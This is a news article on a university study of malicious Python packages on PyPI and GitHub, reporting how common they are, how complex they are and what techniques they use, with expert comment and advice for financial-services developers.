The "cat and mouse game" making Python dangerous to code in
Python is a very versatile language by design, compatible with all manner of different programming languages and technologies. This is the source of its popularity, but it also makes the language more dangerous than you may realize.
A recent study from Nanyang Technological University in Singapore and Sichuan University in China has investigated the prevalence of malicious code in PyPI (the Python Package Index), the ecosystem containing many of the most popular packages for the programming language such as NumPy and Pandas. It analyzed 1556 malicious python packages and 549 randomly chosen benign packages to assess how the former operated and what its goals were.
GitHub is part of the problem. The report said the scale of malicious python code on PyPI is "relatively small" while "malicious projects on GitHub exhibit higher complexity." PyPI averaged 2 malicious files per package with a maximum depth of three layers; GitHub averaged 23 files and 17 layers.
This doesn't mean PyPI malware is any safer or less effective. For 43% of malicious packages, 90% or more of the code itself was malicious. The files are almost pure malware using package name obfuscation to entice users to execute them. The packages are smaller or contain less malicious files because "the complex malicious behavior is stored in the payload and is downloaded during run-time."
This practice, command execution, was the most commonly used technique among malicious PyPI packages, with over 59% of them doing it. The next most popular malicious behaviors were information stealing and file operation.
Responding to the paper on HackerNews forums, Louis Lang, ex-NSA engineer and CTO of malware detection startup Phylum, said "this is likely to be a cat and mouse game for the foreseeable future." Although he is confident "detection will get better," the likelihood is that "attackers will change tactics."
What does that mean for Python in financial services? Almost all the major firms use Python in some way, shape or form, plus the most popular and standardized packages. However, they also have extensive cybersecurity teams with some of the most senior names in the business.
Nonetheless, developers opting to try out new packages would be best served trialing them out in a secure sandboxed environment such as that provided by WebAssembly first and foremost.
Have a confidential story, tip, or comment you’d like to share? Contact: +44 7537 182250 (SMS, Whatsapp or voicemail). Telegram: @SarahButcher. Click here to fill in our anonymous form, or email editortips@efinancialcareers.com. Signal also available
Bear with us if you leave a comment at the bottom of this article: all our comments are moderated by human beings. Sometimes these humans might be asleep, or away from their desks, so it may take a while for your comment to appear. Eventually it will – unless it’s offensive or libelous (in which case it won’t.)